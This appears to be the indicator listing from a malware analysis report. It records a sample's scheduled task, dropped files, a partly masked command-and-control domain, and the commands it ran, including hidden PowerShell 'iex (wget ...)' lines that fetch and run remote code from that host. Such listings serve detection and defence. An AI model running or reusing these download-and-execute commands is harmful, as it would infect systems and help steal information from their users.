Technical Information
- <SYSTEM32>\tasks\{e3acd25c-c313-4061-a87d-edaf1235dccd}
- %APPDATA%temp
- %TEMP%\e653d73e45833b6c
- %APPDATA%\microsoft\windows\templates\officeappmanifest_v6_13_295.xml
- 'mc.#zs.kr':80
- http://mc.#zs.kr/themes/mobile/images/about/temp/upload/list.php?qu#####
- http://mc.#zs.kr/themes/mobile/images/about/temp/attach/attach.docx
- DNS ASK mc.#zs.kr
- '<SYSTEM32>\wscript.exe' /e:vbscript /b %APPDATA%temp
- '<SYSTEM32>\cmd.exe' /c powershell -command "iex (wget http://mc.#zs.kr/themes/mobile/images/about/temp/upload/lib.php?id############# GetInfo -ur 'http://mc.#zs.kr/themes/mobile/images/about/temp/upload';' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -command "iex (wget http://mc.#zs.kr/themes/mobile/images/about/temp/upload/lib.php?id############# GetInfo -ur 'http://mc.#zs.kr/themes/mobile/images/about/temp/upload';
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "iex (wget http://mc.#zs.kr/themes/mobile/images/about/temp/upload/lib.php?id############# GetInfo -ur 'http://mc.#zs.kr/themes/mobile/images/about/temp/upload';